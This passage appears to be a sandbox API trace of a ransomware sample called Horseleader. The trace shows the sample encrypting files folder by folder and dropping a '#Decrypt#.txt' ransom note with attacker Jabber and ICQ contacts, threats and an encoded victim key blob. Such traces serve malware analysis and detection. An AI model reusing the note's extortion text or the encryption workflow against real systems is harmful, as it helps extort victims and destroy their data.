hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.294] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6eb476, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a6eb476, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a6eb476, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.294] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.294] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\#Decrypt#.txt") returned 74 [0234.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.295] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.295] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.296] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.296] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.296] CloseHandle (hObject=0x158) returned 1 [0234.297] GetProcessHeap () returned 0x780000 [0234.297] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0234.297] lstrcmpiW (lpString1="uk-UA", lpString2="Windows") returned -1 [0234.297] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned 60 [0234.297] lstrcmpW (lpString1="uk-UA", lpString2=".") returned 1 [0234.297] lstrcmpW (lpString1="uk-UA", lpString2="..") returned 1 [0234.297] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.297] GetProcessHeap () returned 0x780000 [0234.297] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.297] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*") returned 62 [0234.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.298] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\.") returned 62 [0234.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.298] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.298] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\..") returned 63 [0234.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.298] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe29f63af, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2c31822, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2c31822, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.298] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.298] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui") returned 76 [0234.298] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.298] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.298] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.299] lstrlenW (lpString=".testttjffg") returned 11 [0234.299] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.299] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.299] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.299] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe29f63af, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2c31822, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2c31822, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.299] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.299] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\#Decrypt#.txt") returned 74 [0234.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.300] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.300] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.301] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.301] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.301] CloseHandle (hObject=0x158) returned 1 [0234.301] GetProcessHeap () returned 0x780000 [0234.301] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.301] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0234.301] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0234.301] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned 60 [0234.302] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0234.302] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0234.302] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.302] GetProcessHeap () returned 0x780000 [0234.302] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.302] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*") returned 62 [0234.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.303] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.303] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\.") returned 62 [0234.303] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.303] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.303] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.303] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\..") returned 63 [0234.303] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.304] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d513f43, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d513f43, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d53a0a3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.304] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.304] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui") returned 76 [0234.304] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.304] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.304] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.304] lstrlenW (lpString=".testttjffg") returned 11 [0234.304] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.304] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.304] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.305] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d513f43, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d513f43, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d53a0a3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.305] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.305] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\#Decrypt#.txt") returned 74 [0234.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.316] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.316] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.317] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7